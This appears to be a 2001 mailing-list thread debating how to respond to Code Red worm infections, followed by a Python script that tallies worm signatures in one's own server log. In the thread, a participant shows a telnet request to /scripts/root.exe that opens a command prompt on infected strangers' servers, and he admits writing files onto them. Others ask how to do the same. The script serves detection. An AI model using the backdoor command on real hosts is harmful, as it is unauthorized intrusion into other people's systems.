I thought an open door is like an open invitation... or is that just what my high school gym teacher just said...

Chris

----- Original Message -----
From: "George Toft"
To:
Sent: Thursday, August 09, 2001 8:03 AM
Subject: Re: CR worm infection attempts

> If you are walking down the street, and see a house with the door
> open, do you walk in to see if anyone is home? When you return, and
> see the windows broken out, and the outside spray-painted, how do you
> feel? I think this is a similar situation - if you walk in uninvited,
> it's called "illegal entry" and you may be arrested. Likewise, testing
> a site to see if it has been exploited is illegal as you were accessing
> their computer in an unauthorized fashion.
>
> Could you have stopped the crimes in both cases? Maybe (if the owner
> listened to you). Is it worth the risk to you, your reputation, and
> your family? No. I am not selfish - I am placing my family ahead of
> strangers, and they rely upon my income. I suggest you do the same -
> just keep on walking, and make sure you have the safeguards of Fort
> Knox at home.
>
> George
>
>
> Derek Neighbors wrote:
> >
> > That is the problem.
> >
> > I looked at my logs out of curiosity. I was AMAZED at the figures. I
> > took the first IP and hit it and checked for the root.exe exploit. Sure
> > enough it was WIDE open.
> >
> > Now I had a DILEMMA on my hands. Do I notify this company or not? I had
> > no malicious intent nor did I do anything. The 'good' in me wanted to
> > notify them so that they were not 'toasted' by one with 'ill' intent.
> >
> > HOWEVER, I feared lawsuit, death and dismemberment. So I said not a word.
> > I looked at their website about 4 hours later and they were defaced. :(
> >
> > What kind of a world is it? I mean if I was walking down the street with
> > my fly open, I would hope to God someone would tell me. However, I
> > suppose even in that case you should be careful. I mean after all,
> > notifying someone that their fly was open, means you were looking at
> > their crotch. If you were looking at their crotch you must have been
> > wanting to rape them or harass them.
> >
> > Where does the silliness stop?
> >
> > -Derek
> >
> > On Wed, 8 Aug 2001, Kim Allen wrote:
> >
> > > I've been contacting the sites that my server logs show have been
> > > hitting me with the code red signature and so far no one has bothered to
> > > respond except for one. However that site has told me how secure they are
> > > and how there is no way that they have any problems. When I sent them the
> > > portions of my server logs showing they do have a problem they threaten
> > > legal action. Has anyone else had this type of response?
> > >
> > > > To answer your question... make sure you're hitting enter TWICE after
> > > > the command.
> > > >
> > > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > > Check it out:
> > > >
> > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > > Trying xxx.xxx.xxx.xxx...
> > > > Connected to xxx.xxx.xxx.xxx.
> > > > Escape character is '^]'.
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > HTTP/1.1 200 OK
> > > > Server: Microsoft-IIS/5.0
> > > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > > Content-Type: application/octet-stream
> > > > Microsoft Windows 2000 [Version 5.00.2195]
> > > > (C) Copyright 1985-1999 Microsoft Corp.
> > > >
> > > > c:\inetpub\scripts>
> > > >
> > > > From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > > > that explains how I did it, and why they need to pay attention to
> > > > security patches. :)
> > > >
> > > > Hopefully they won't take it the 'wrong' way.
> > > >
> > > > ~g~
> > > >
> > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > > Wayne Conrad wrote:
> > > > > >
> > > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > > keep recreating the same data each time.
> > > > > >
> > > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > > Wayne
> > > > > ________________________________________________
> > > > >
> > > > > I've been trying that out
> > > > >
> > > > > telnet ipaddress_from_my_httpd_access_log 80
> > > > >
> > > > > GET /scripts/root.exe HTTP/1.0
> > > > >
> > > > > but I can't get a command prompt - what am I missing?
> > > > >
> > > > > Craig
> > > > > ________________________________________________
> > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > > >
> > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
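
The log collection J.Francois and Kim Allen describe in the thread (gathering the Code Red hits from your own web server log once, so every complaint can point at the same data) can be scripted without touching any remote host. This is an added example, not code from any list member: it assumes Apache Common Log Format, the log lines are constructed, and the N versus X padding letter used to tell Code Red from Code Red II is the worms' publicly documented request signature.

```python
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format prefix: host ident user [timestamp] "METHOD path ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|HEAD|POST) (\S+)')

# Request signatures seen in a victim's own access log. The padding letter
# after default.ida? separates the variants: 'N' = Code Red, 'X' = Code Red II.
SIGNATURES = [
    ("code-red", re.compile(r"^/default\.ida\?N{20,}")),
    ("code-red-ii", re.compile(r"^/default\.ida\?X{20,}")),
    ("root.exe-probe", re.compile(r"^/scripts/root\.exe", re.I)),
]

def classify(path):
    # Return the name of the first matching signature, or None.
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return None

def summarise(lines):
    """Map source address -> hits, signature kinds, first and last time seen."""
    report = defaultdict(lambda: {"hits": 0, "kinds": set(), "first": None, "last": None})
    for line in lines:
        m = LINE.match(line)
        kind = classify(m.group(3)) if m else None
        if kind is None:
            continue  # unparseable line or ordinary traffic
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        entry = report[m.group(1)]
        entry["hits"] += 1
        entry["kinds"].add(kind)
        entry["first"] = min(entry["first"] or when, when)
        entry["last"] = max(entry["last"] or when, when)
    return dict(report)

# Constructed sample lines: documentation-range addresses, padding only, no payload.
SAMPLE = [
    '192.0.2.10 - - [05/Aug/2001:14:02:11 -0700] "GET /default.ida?' + "X" * 224 + ' HTTP/1.0" 404 276',
    '198.51.100.7 - - [05/Aug/2001:14:05:40 -0700] "GET /default.ida?' + "N" * 224 + ' HTTP/1.0" 404 276',
    '192.0.2.99 - - [05/Aug/2001:14:06:02 -0700] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [05/Aug/2001:19:44:53 -0700] "GET /default.ida?' + "X" * 224 + ' HTTP/1.0" 404 276',
    '203.0.113.5 - - [06/Aug/2001:04:22:13 -0700] "GET /scripts/root.exe HTTP/1.0" 404 281',
]

if __name__ == "__main__":
    for ip, e in sorted(summarise(SAMPLE).items()):
        print(ip, e["hits"], ",".join(sorted(e["kinds"])), e["first"].isoformat(), e["last"].isoformat())
```

The per-address first and last timestamps are what an abuse contact needs to match the report against their own logs.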